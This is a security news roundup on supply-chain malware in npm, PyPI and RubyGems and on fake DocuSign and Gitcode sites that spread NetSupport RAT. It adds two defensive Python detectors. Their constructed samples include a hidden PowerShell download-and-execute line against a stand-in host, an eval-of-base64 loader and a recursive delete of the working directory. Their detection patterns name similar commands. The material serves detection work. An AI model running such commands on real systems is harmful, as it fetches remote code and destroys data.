CyberSecurity news
drewt@secureworldexpo.com (Drew@SecureWorld News)
A surge in malicious packages targeting cryptocurrency wallets, Telegram bot tokens, and codebase integrity has been reported across npm, PyPI, and RubyGems, underlining the persistent exposure of the open-source software supply chain. Threat actors exploit developer trust by publishing clones of legitimate packages. Once installed, the clones execute payloads ranging from cryptocurrency theft to deletion of the entire codebase. Researchers also found packages that reroute Telegram Bot API traffic to attacker-controlled command-and-control servers, exfiltrating bot tokens, chat IDs, message content, and attached files.
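The behaviours described above (install-time hooks, Telegram Bot API traffic sent to a non-official host, decode-then-execute loaders, and recursive deletes of the working tree) can be checked for before a dependency is trusted. The following is an added example written for this page, not code from SecureWorld or any of the cited researchers; the package names, the relay host and the file contents are constructed, and the rules are heuristics that only catch literal hosts and literal base64 strings.

```python
"""Heuristic audit of npm package contents: lifecycle hooks, Telegram Bot API
traffic sent to a non-official host, packed loaders, and recursive deletes.
Added example; package names, hosts and sources below are constructed."""
import json
import re
from dataclasses import dataclass

# Hooks npm runs automatically during `npm install`, i.e. code that executes
# before the developer ever imports the package.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall"}
OFFICIAL_TELEGRAM_HOST = "api.telegram.org"

# Bot API calls look like https://<host>/bot<token>/<method>; any other host in
# that position means bot traffic (and the token) is being proxied elsewhere.
BOT_URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)(?::\d+)?/bot", re.IGNORECASE)
# Dynamic evaluation or a child process next to a long base64 literal is the
# usual shape of a packed second stage.
DYNAMIC_EXEC_RE = re.compile(r"\b(eval|new Function|child_process|execSync|spawnSync)\b")
LONG_B64_RE = re.compile(r"[\"'][A-Za-z0-9+/]{80,}={0,2}[\"']")
# Recursive deletion of a directory tree (shell or Node fs API).
DESTRUCTIVE_RE = re.compile(r"(rm\s+-rf\s|rmSync\([^;]*recursive\s*:\s*true|rimraf\()")


@dataclass(frozen=True)
class Finding:
    package: str
    file: str
    rule: str
    detail: str


def audit_package(name: str, package_json: str, sources: dict) -> list:
    """Return findings for one package given its package.json text and a
    mapping of source file name -> file contents."""
    findings = []
    manifest = json.loads(package_json)
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(Finding(name, "package.json", "lifecycle-hook", f"{hook}: {cmd}"))
    for fname, text in sources.items():
        for m in BOT_URL_RE.finditer(text):
            host = m.group(1).lower()
            if host != OFFICIAL_TELEGRAM_HOST:
                findings.append(Finding(name, fname, "telegram-reroute", f"bot API host is {host}"))
        if DYNAMIC_EXEC_RE.search(text) and LONG_B64_RE.search(text):
            findings.append(Finding(name, fname, "encoded-loader",
                                    "dynamic execution next to a long base64 literal"))
        hit = DESTRUCTIVE_RE.search(text)
        if hit:
            findings.append(Finding(name, fname, "destructive-fs", hit.group(0).strip()))
    return findings


def run_audit(packages: dict) -> dict:
    """packages: name -> (package.json text, {file name: contents})."""
    return {name: audit_package(name, pj, src) for name, (pj, src) in packages.items()}


# Constructed samples: a benign Telegram helper and a lookalike clone of it.
SAMPLE_PACKAGES = {
    "telegram-helper": (
        json.dumps({"name": "telegram-helper", "version": "1.0.0",
                    "scripts": {"test": "node test.js"}}),
        {"index.js": 'const base = "https://api.telegram.org/bot" + token;\n'},
    ),
    "telegram-helpr": (
        json.dumps({"name": "telegram-helpr", "version": "1.0.1",
                    "scripts": {"postinstall": "node setup.js"}}),
        {
            "index.js": 'const base = "https://tg-relay.example/bot" + token;\n',
            "setup.js": 'const { execSync } = require("child_process");\n'
                        'eval(Buffer.from("' + "QUFBQUFB" * 15 + '", "base64").toString());\n'
                        'require("fs").rmSync(process.cwd(), { recursive: true, force: true });\n',
        },
    ),
}

if __name__ == "__main__":
    for pkg, found in run_audit(SAMPLE_PACKAGES).items():
        print(pkg, "clean" if not found else "")
        for f in found:
            print(f"  [{f.rule}] {f.file}: {f.detail}")
```

The benign package produces no findings because its only Bot API host is api.telegram.org and it has no install hooks; the clone trips all four rules. A host built from a template variable or a payload split across several short strings would slip past these regexes, so treat a clean result as "nothing obvious", not as a verdict.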
This activity is not limited to package registries. A separate campaign uses deceptive websites spoofing Gitcode and DocuSign to trick users into running malicious PowerShell on their Windows machines. The sites instruct victims to copy a command and paste it into the Windows Run prompt; that command is a first-stage downloader that retrieves further payloads from several domains and ultimately installs the NetSupport RAT (Remote Access Trojan).
Sophos researchers also exposed a large-scale GitHub campaign in which backdoored malware was disguised as legitimate tools, spread across numerous repositories posing as exploits, game cheats, and open-source utilities. Compiling the code triggered infection chains involving VBS scripts, PowerShell downloads, and obfuscated Electron apps, ultimately deploying information stealers and RATs. The campaign relies on several layers of deception, including automated commits that simulate active development and obfuscated payloads that evade detection, which shows how far these actors will go to exploit the software supply chain.
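Both execution chains above leave a distinctive process-creation footprint: a command pasted into the Run prompt is spawned by explorer.exe, and a build step that launches a .vbs file shows up as a build tool starting Windows Script Host. The following detection logic is an added example written for this page, not code from Sophos, The Hacker News or any vendor; it runs over constructed events shaped like the ParentImage, Image and CommandLine fields of Sysmon Event ID 1, and the paths and hostnames in the samples are made up.

```python
"""Detection for the paste-into-Run and compile-triggered chains above, run
over constructed process-creation events (Sysmon Event ID 1 field subset).
Added example; the events, paths and hostnames are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Interpreters a pasted one-liner typically runs under.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Windows Script Host binaries that execute .vbs files.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Build tooling that should not be launching a script host (assumption: direct
# parent only; chains routed through cmd.exe need the grandparent, which
# Sysmon does not record by default).
BUILD_TOOLS = {"msbuild.exe", "devenv.exe", "node.exe"}
# Download cradles, encoded commands, hidden windows and bare URLs: the shape
# of a stage-one command copied from a fake verification page.
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|https?://)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return a rule name if the event matches one of the chains, else None."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    # Commands typed into Win+R are spawned by explorer.exe; a shell child of
    # explorer with a download cradle in its arguments is the stage one of the
    # paste-into-Run chain, while a plain interactive console is not flagged.
    if parent == "explorer.exe" and child in SHELLS and CRADLE_RE.search(ev.command_line):
        return "run-dialog-download-cradle"
    # A build tool starting Windows Script Host on a .vbs file is the
    # compile-triggered chain from the backdoored-repository campaign.
    if parent in BUILD_TOOLS and child in SCRIPT_HOSTS and ".vbs" in ev.command_line.lower():
        return "build-spawns-vbs"
    return None


def triage(events):
    """Return (event, rule) pairs for every event that matched, in order."""
    return [(ev, rule) for ev in events if (rule := classify(ev))]


SAMPLE_EVENTS = [  # constructed
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr https://verify.example/x.ps1 | iex"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //B C:\src\tool\obj\setup.vbs"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad"),
]

if __name__ == "__main__":
    for ev, rule in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line}")
```

Only the first and third sample events are flagged; a user opening a PowerShell console from the Run prompt is left alone because no cradle, encoded command or URL appears on its command line. The build rule is deliberately narrow and will miss a .vbs launched through an intermediate cmd.exe, so in production it should be paired with a parent-chain lookup or a rule on cmd.exe running a pre-build event.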
References:
- SecureWorld News: Malicious Open-Source Packages Target Crypto Wallets, Telegram Tokens, and Codebases
- The Hacker News: Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
- Catalin Cimpanu: A threat actor compromised 16 npm libraries from the Gluestack UI framework. The attacker compromised a Gluestack admin's account, added a RAT to the libraries, and pushed updates on Friday. It's the same threat actor behind the rand-user-agent package last month.
- securityaffairs.com: SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 48
- The Hacker News: New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
- www.linkedin.com: The attacker compromised a Gluestack admin's account, added a RAT to the libraries, and pushed updates on Friday.
- hackread.com: Hidden Backdoors in npm Packages Let Attackers Wipe Entire Systems
- bsky.app: A significant supply chain attack hit NPM after 15 popular Gluestack packages with over 950,000 weekly downloads were compromised to include malicious code that acts as a remote access trojan (RAT).
- BleepingComputer: Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
- www.itpro.com: Developers beware: Malware has been found in a dozen popular NPM packages – here’s what you need to know
Classification:
- HashTags: #SupplyChain #Malware #OpenSource
- Company: Multiple
- Target: Developers, gamers, crypto users
- Product: npm, PyPI, RubyGems
- Feature: package management
- Malware: NetSupport RAT
- Type: Malware
- Severity: HighRisk